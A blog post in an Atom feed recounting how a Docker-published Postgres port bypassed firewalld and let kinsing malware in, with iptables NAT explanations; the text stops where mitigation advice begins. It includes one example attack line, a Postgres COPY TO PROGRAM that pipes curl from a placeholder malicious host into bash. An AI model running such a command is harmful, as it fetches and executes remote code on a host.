<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:base="https://martingaston.dev">
  <title>martingaston.dev</title>
  <subtitle>I&#39;m Martin, a computer person living in London. I love longform content, systems programming and deploying on Fridays.</subtitle>
  <link href="https://martingaston.dev/feed/feed.xml" rel="self"/>
  <link href="https://martingaston.dev"/>
  <updated>2025-11-16T00:00:00Z</updated>
  <id>https://martingaston.dev</id>
  <author>
    <name>Martin Gaston</name>
    <email>hello@martingaston.dev</email>
  </author>
  <entry>
    <title>Docker Got Me Hacked On Halloween</title>
    <link href="https://martingaston.dev/articles/docker-got-me-hacked-on-halloween/"/>
    <updated>2025-11-16T00:00:00Z</updated>
    <id>https://martingaston.dev/articles/docker-got-me-hacked-on-halloween/</id>
    <content xml:lang="en" type="html">&lt;p&gt;Docker on Linux futzes with its own &lt;code&gt;iptables&lt;/code&gt; and so totally sidesteps &lt;code&gt;firewalld&lt;/code&gt;/&lt;code&gt;ufw&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Let&#39;s rewind.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Friday, October 31:&lt;/strong&gt; I spun up a Postgres instance in a Docker container on one of my VMs for a proof-of-concept demo I&#39;d be doing the next week. I had &lt;code&gt;firewalld&lt;/code&gt; configured to deny incoming connections to port 5432, so I didn&#39;t even think about securing the database - it surely wouldn&#39;t be accessible on the public internet!&lt;/p&gt;
&lt;p&gt;Look. What I did here was terrible. I copied and pasted the &lt;code&gt;docker run --name some-postgres -e POSTGRES_PASSWORD=mysecretpassword -d postgres&lt;/code&gt; command from &lt;a href=&quot;https://hub.docker.com/_/postgres&quot;&gt;the Postgres image&lt;/a&gt;, exposed &lt;code&gt;-p 5432&lt;/code&gt; and called it a day.&lt;/p&gt;
&lt;p&gt;This was lazy and bad, but I thought that access from the public internet would be blocked. Only another machine inside my &lt;a href=&quot;https://tailscale.com/&quot;&gt;tailnet&lt;/a&gt; was going to access it. No big deal.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Monday, November 3:&lt;/strong&gt; Came back after a lovely weekend of not thinking about technology. But alas, the &lt;a href=&quot;https://malpedia.caad.fkie.fraunhofer.de/details/elf.kinsing&quot;&gt;kinsing&lt;/a&gt; malware had made its way onto the machine and was obliterating my poor 1 vCPU to mine cryptocurrency.&lt;/p&gt;
&lt;h2 id=&quot;but%2C-how%3F&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/docker-got-me-hacked-on-halloween/#but%2C-how%3F&quot;&gt;But, how?&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Firstly, did you know PostgreSQL can run arbitrary commands on the host machine?&lt;/p&gt;
&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;COPY &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;SELECT&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&#39;&#39;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;TO&lt;/span&gt; PROGRAM &lt;span class=&quot;token string&quot;&gt;&#39;curl http://a-very-naughty-server.com/malicious-crypto-miner-install-script.sh | bash&#39;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That&#39;ll do it.&lt;/p&gt;
&lt;p&gt;Did you also know that the &lt;code&gt;-p 5432&lt;/code&gt; flag binds to &lt;code&gt;0.0.0.0&lt;/code&gt;, an IPv4 address which represents all possible network interfaces - including any connected to the public internet?&lt;/p&gt;
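&lt;p&gt;If you want to see what a running container has actually published, &lt;code&gt;docker port&lt;/code&gt; will tell you. A quick sketch, assuming the container is still called &lt;code&gt;some-postgres&lt;/code&gt; as in the Docker Hub example:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;# Lists each published container port and the host address:port it is mapped to&lt;br /&gt;$ docker port some-postgres&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any mapping that starts with &lt;code&gt;0.0.0.0&lt;/code&gt; is listening on every IPv4 interface the host has.&lt;/p&gt;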
&lt;p&gt;Now, this &lt;code&gt;0.0.0.0&lt;/code&gt; binding isn&#39;t something you have to worry about if you&#39;re using Docker Desktop on macOS, because you&#39;re actually running inside a VM. And that VM only interacts with your host network&#39;s &lt;code&gt;localhost&lt;/code&gt;. But on Linux that would mean you&#39;ve basically opened the door to the whole internet, unless you&#39;ve got a firewall blocking that port.&lt;/p&gt;
&lt;p&gt;Which is what I had though, right? That&#39;s &lt;em&gt;literally&lt;/em&gt; &lt;code&gt;firewalld&lt;/code&gt;. &lt;strong&gt;The clue is in the name!&lt;/strong&gt;&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; firewall-cmd &lt;span class=&quot;token parameter variable&quot;&gt;--zone&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;public --list-all&lt;br /&gt;public &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;default, active&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  target: DROP&lt;br /&gt;  ingress-priority: &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;br /&gt;  egress-priority: &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;br /&gt;  icmp-block-inversion: no&lt;br /&gt;  interfaces: ens3&lt;br /&gt;  sources:&lt;br /&gt;  services: dhcpv6-client http https mdns&lt;br /&gt;  ports:&lt;br /&gt;  protocols:&lt;br /&gt;  forward: &lt;span class=&quot;token function&quot;&gt;yes&lt;/span&gt;&lt;br /&gt;  masquerade: no&lt;br /&gt;  forward-ports:&lt;br /&gt;  source-ports:&lt;br /&gt;  icmp-blocks:&lt;br /&gt;  rich rules:&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Deny by default! Drop anything that&#39;s not http(s), mDNS or some thingamajig for IPv6! No port &lt;code&gt;5432&lt;/code&gt; for you!&lt;/p&gt;
&lt;p&gt;Actually, no.&lt;/p&gt;
&lt;p&gt;Let&#39;s run a basic &lt;code&gt;nginx&lt;/code&gt; container and expose container port &lt;code&gt;80&lt;/code&gt; to port &lt;code&gt;8000&lt;/code&gt; on the host:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token function&quot;&gt;docker&lt;/span&gt; run &lt;span class=&quot;token parameter variable&quot;&gt;--rm&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-p&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;8000&lt;/span&gt;:80 nginx&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And then from a &lt;em&gt;totally different computer&lt;/em&gt; let&#39;s quite happily access that page:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token function&quot;&gt;curl&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;104.21&lt;/span&gt;.1.191:8000&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;DOCTYPE html&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;html&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;head&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;title&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;Welcome to nginx&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/title&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;style&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;html &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; color-scheme: light dark&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;br /&gt;body &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; width: 35em&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; margin: &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt; auto&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;font-family: Tahoma, Verdana, Arial, sans-serif&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token 
operator&quot;&gt;&amp;lt;&lt;/span&gt;/style&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/head&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;body&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;h&lt;span class=&quot;token operator&quot;&gt;&lt;span class=&quot;token file-descriptor important&quot;&gt;1&lt;/span&gt;&gt;&lt;/span&gt;Welcome to nginx&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/h&lt;span class=&quot;token operator&quot;&gt;&lt;span class=&quot;token file-descriptor important&quot;&gt;1&lt;/span&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;p&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;If you see this page, the nginx web server is successfully installed and&lt;br /&gt;working. 
Further configuration is required.&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/p&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;p&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;For online documentation and support please refer to&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;a &lt;span class=&quot;token assign-left variable&quot;&gt;href&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;http://nginx.org/&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;nginx.org&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/a&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;.&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;br/&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;Commercial support is available at&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;a &lt;span class=&quot;token assign-left variable&quot;&gt;href&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;http://nginx.com/&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;nginx.com&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/a&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;.&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/p&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;p&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;em&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;Thank you &lt;span class=&quot;token 
keyword&quot;&gt;for&lt;/span&gt; using nginx.&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/em&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/p&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/body&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/html&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How is this madness happening? I&#39;ve said it before, but: it shouldn&#39;t be getting through the firewall!?&lt;/p&gt;
&lt;p&gt;Alright, let&#39;s do this. Hold on to something.&lt;/p&gt;
&lt;p&gt;Let&#39;s remove some of Docker&#39;s functionality, namely its ability to set its own &lt;code&gt;iptables&lt;/code&gt; rules and the &lt;code&gt;userland-proxy&lt;/code&gt;. We won&#39;t worry about what the latter is in this article.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;iptables&lt;/code&gt; is a very powerful tool that allows you to fiddle around with the &lt;a href=&quot;https://www.netfilter.org/&quot;&gt;netfilter&lt;/a&gt; kernel module, which is all very terrifying and cool.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token builtin class-name&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&#39;{&quot;iptables&quot;:false,&quot;userland-proxy&quot;:false}&#39;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;tee&lt;/span&gt; /etc/docker/daemon.json&lt;br /&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;iptables&quot;&lt;/span&gt;:false,&lt;span class=&quot;token string&quot;&gt;&quot;userland-proxy&quot;&lt;/span&gt;:false&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; systemctl restart &lt;span class=&quot;token function&quot;&gt;docker&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now, finally, a &lt;code&gt;curl 104.21.1.191:8000&lt;/code&gt; does nothing. It&#39;s also broken a whole bunch of other important things to do with container networking, but we won&#39;t worry about that.&lt;/p&gt;
&lt;p&gt;Let&#39;s figure out the IP of the container inside the &lt;code&gt;docker0&lt;/code&gt; bridge network:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token function&quot;&gt;docker&lt;/span&gt; inspect 1bba7bc8e37f &lt;span class=&quot;token parameter variable&quot;&gt;-f&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&#39;{{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}}&#39;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;172.17&lt;/span&gt;.0.2&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now we can muck around with &lt;code&gt;iptables&lt;/code&gt; ourselves so that requests to &lt;code&gt;104.21.1.191:8000&lt;/code&gt; go to &lt;code&gt;172.17.0.2:80&lt;/code&gt;. To do this we&#39;ll be using Network Address Translation (NAT), which is how the majority of container networking is handled.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;iptables&lt;/code&gt; is powerful and complex and probably not worth investing a great amount of time into figuring out, as it&#39;s been superseded by &lt;code&gt;nftables&lt;/code&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;# PREROUTING runs before any other routing decisions; the packet is on the way in&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token comment&quot;&gt;# -p specifies tcp protocol&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token comment&quot;&gt;# --dport is the destination port, so requests to port 8000&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token comment&quot;&gt;# -j jumps to destination NAT (DNAT), which changes the packet&#39;s destination IP and/or port&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token comment&quot;&gt;# --to-destination specifies what the address ends up as: it&#39;s 172.17.0.2:80, aka where our container is running&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; iptables &lt;span class=&quot;token parameter variable&quot;&gt;-t&lt;/span&gt; nat &lt;span class=&quot;token parameter variable&quot;&gt;-A&lt;/span&gt; PREROUTING &lt;span class=&quot;token parameter variable&quot;&gt;-p&lt;/span&gt; tcp &lt;span class=&quot;token parameter variable&quot;&gt;--dport&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;8000&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-j&lt;/span&gt; DNAT --to-destination &lt;span class=&quot;token number&quot;&gt;172.17&lt;/span&gt;.0.2:80&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;token comment&quot;&gt;# POSTROUTING runs after other routing decisions; the packet is on the way out&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token comment&quot;&gt;# -s matches packets originating from 172.17.0.2, i.e. our container&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token comment&quot;&gt;# ! -o docker0 will only match packets that aren&#39;t trying to exit through the docker0 interface&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token comment&quot;&gt;# -j MASQUERADE will dynamically rewrite the source IP to the host&#39;s outgoing address&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; iptables &lt;span class=&quot;token parameter variable&quot;&gt;-t&lt;/span&gt; nat &lt;span class=&quot;token parameter variable&quot;&gt;-A&lt;/span&gt; POSTROUTING &lt;span class=&quot;token parameter variable&quot;&gt;-s&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;172.17&lt;/span&gt;.0.2/32 &lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-o&lt;/span&gt; docker0 &lt;span class=&quot;token parameter variable&quot;&gt;-j&lt;/span&gt; MASQUERADE&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;token comment&quot;&gt;# Allows packets that are heading to the container to go through the firewall - this rule will occur _after_ the original packet has had its destination address changed&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; iptables &lt;span class=&quot;token parameter variable&quot;&gt;-A&lt;/span&gt; FORWARD &lt;span class=&quot;token parameter variable&quot;&gt;-p&lt;/span&gt; tcp &lt;span class=&quot;token parameter variable&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;172.17&lt;/span&gt;.0.2 &lt;span class=&quot;token parameter variable&quot;&gt;--dport&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;80&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-j&lt;/span&gt; ACCEPT&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;token comment&quot;&gt;# Allows packets that are coming out of the container to go through the firewall&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; iptables &lt;span class=&quot;token parameter variable&quot;&gt;-A&lt;/span&gt; FORWARD &lt;span class=&quot;token parameter variable&quot;&gt;-p&lt;/span&gt; tcp &lt;span class=&quot;token parameter variable&quot;&gt;-s&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;172.17&lt;/span&gt;.0.2 &lt;span class=&quot;token parameter variable&quot;&gt;--sport&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;80&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-j&lt;/span&gt; ACCEPT&lt;/code&gt;&lt;/pre&gt;
&lt;blockquote&gt;
&lt;p&gt;Docker doesn&#39;t add these exact rules, but these are easier to understand and it&#39;s close enough.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;What we see here is that if a packet arrives at the machine asking for port &lt;code&gt;8000&lt;/code&gt;, the rules will transmogrify it to actually be for &lt;code&gt;172.17.0.2:80&lt;/code&gt; and then it can be flung over to the &lt;code&gt;docker0&lt;/code&gt; bridge network. On the way out, we once again modify the packet so that the reply looks as if it came from the address the client originally called.&lt;/p&gt;
&lt;p&gt;And we&#39;re back:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token function&quot;&gt;curl&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;104.21&lt;/span&gt;.1.191:8000&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;DOCTYPE html&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;html&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;head&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;title&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;Welcome to nginx&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/title&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;style&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;html &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; color-scheme: light dark&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;br /&gt;body &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; width: 35em&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; margin: &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt; auto&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;font-family: Tahoma, Verdana, Arial, sans-serif&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token 
operator&quot;&gt;&amp;lt;&lt;/span&gt;/style&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/head&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;body&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;h&lt;span class=&quot;token operator&quot;&gt;&lt;span class=&quot;token file-descriptor important&quot;&gt;1&lt;/span&gt;&gt;&lt;/span&gt;Welcome to nginx&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/h&lt;span class=&quot;token operator&quot;&gt;&lt;span class=&quot;token file-descriptor important&quot;&gt;1&lt;/span&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;p&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;If you see this page, the nginx web server is successfully installed and&lt;br /&gt;working. 
Further configuration is required.&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/p&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;p&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;For online documentation and support please refer to&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;a &lt;span class=&quot;token assign-left variable&quot;&gt;href&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;http://nginx.org/&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;nginx.org&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/a&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;.&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;br/&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;Commercial support is available at&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;a &lt;span class=&quot;token assign-left variable&quot;&gt;href&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;http://nginx.com/&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;nginx.com&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/a&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;.&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/p&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;p&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;em&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;Thank you &lt;span class=&quot;token 
keyword&quot;&gt;for&lt;/span&gt; using nginx.&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/em&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/p&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/body&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;/html&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We haven&#39;t messed with &lt;code&gt;firewalld&lt;/code&gt; at all during this. &lt;code&gt;firewalld&lt;/code&gt; is still configured to deny the request to port &lt;code&gt;8000&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;This is all fun and games, but why does it clash with &lt;code&gt;firewalld&lt;/code&gt;? Well, &lt;code&gt;firewalld&lt;/code&gt; (and &lt;code&gt;ufw&lt;/code&gt;) &lt;em&gt;also&lt;/em&gt; work by programming the kernel-level netfilter features, and the two sets of rules end up stepping on each other. Docker&#39;s use of &lt;code&gt;iptables&lt;/code&gt; will essentially punch a hole straight through whatever you&#39;d asked &lt;code&gt;firewalld&lt;/code&gt; to be doing.&lt;/p&gt;
&lt;p&gt;This is why I got hacked - I basically left the front door wide open. I&#39;m not complaining. I was rushing around and not paying attention. Docker has all the relevant information nestled within their documentation. Binding a database to &lt;code&gt;0.0.0.0&lt;/code&gt; is &lt;em&gt;obviously&lt;/em&gt; a bad idea, even if you&#39;re largely just mucking about. And not changing the password from the one that&#39;s listed on the Docker Hub page is literally asking for trouble.&lt;/p&gt;
&lt;h2&gt;What can you do about it?&lt;/h2&gt;
&lt;p&gt;If you don&#39;t want to start mucking around with your OS, you could follow a couple of simple rules:&lt;/p&gt;
&lt;ol&gt;
